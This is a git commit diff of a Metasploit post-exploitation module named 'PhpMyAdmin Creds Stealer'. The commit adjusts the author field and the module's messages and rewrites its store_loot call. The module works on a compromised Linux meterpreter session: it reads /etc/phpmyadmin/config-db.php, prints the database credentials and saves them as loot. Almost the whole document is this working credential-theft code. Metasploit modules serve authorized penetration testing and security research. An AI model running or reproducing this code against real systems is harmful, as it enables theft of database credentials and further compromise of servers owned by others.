Updating store_loot?
Dhiraj Mishra
GitHub
parent
a018d24df4
commit
107baee0a2
|
|
@ -4,6 +4,7 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Post::Linux::Priv
|
include Msf::Post::Linux::Priv
|
||||||
include Msf::Post::Linux::System
|
include Msf::Post::Linux::System
|
||||||
|
|
@ -16,15 +17,16 @@ class MetasploitModule < Msf::Post
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => ['linux'],
|
'Platform' => ['linux'],
|
||||||
'Privileged' => 'true', #This requires root privileges
|
|
||||||
'SessionTypes' => ['meterpreter'],
|
'SessionTypes' => ['meterpreter'],
|
||||||
'Arch' => 'x86_x64',
|
'Arch' => 'x86_x64',
|
||||||
|
'Privileged' => 'true',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
|
[ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
|
||||||
|
|
||||||
],
|
],
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'bofheaded',
|
'Chaitanya Haritash [bofheaded]',
|
||||||
'Dhiraj Mishra <dhiraj@notsosecure.com>'
|
'Dhiraj Mishra <dhiraj@notsosecure.com>'
|
||||||
]
|
]
|
||||||
))
|
))
|
||||||
|
|
@ -36,7 +38,10 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
print_line('PhpMyAdmin Creds Stealer')
|
|
||||||
|
sess = client
|
||||||
|
print_line("\nPhpMyAdmin Creds Stealer!\n")
|
||||||
|
cred_dump = ""
|
||||||
|
|
||||||
if session.platform.include?("windows")
|
if session.platform.include?("windows")
|
||||||
print_error("This Module is not Compatible with Windows")
|
print_error("This Module is not Compatible with Windows")
|
||||||
|
|
@ -44,23 +49,19 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
conf_path= "/etc/phpmyadmin/config-db.php"
|
conf_path= "/etc/phpmyadmin/config-db.php"
|
||||||
unless file_exist?(conf_path)
|
if file_exist?(conf_path) == false
|
||||||
vprint_error("#{conf_path} doesn't exist on target")
|
print_error("#{conf_path} doesn't exist on target")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_good('PhpMyAdmin config found!')
|
print_good('PhpMyAdmin config found!')
|
||||||
print_good("Extracting config file!\n")
|
print_good("Extracting Creds")
|
||||||
res = read_file(conf_path)
|
res = read_file(conf_path)
|
||||||
print_line res
|
|
||||||
vprint_good("#{peer} - #{res.body}")
|
cred_dump << res
|
||||||
path = store_loot(
|
store_loot("phpmyadmin_conf","text/plain",sess,cred_dump,"phpmyadmin_conf.txt","phpmyadmin_conf")
|
||||||
'phpmyadmin.credsteal',
|
print_good("Storing dump in ~/.msf4/loot/")
|
||||||
'text/plain',
|
print_status("Extracted Creds ::\n")
|
||||||
ip,
|
print_line(res)
|
||||||
res.body,
|
|
||||||
filename
|
|
||||||
)
|
|
||||||
print_good("File saved in: #{path}")
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue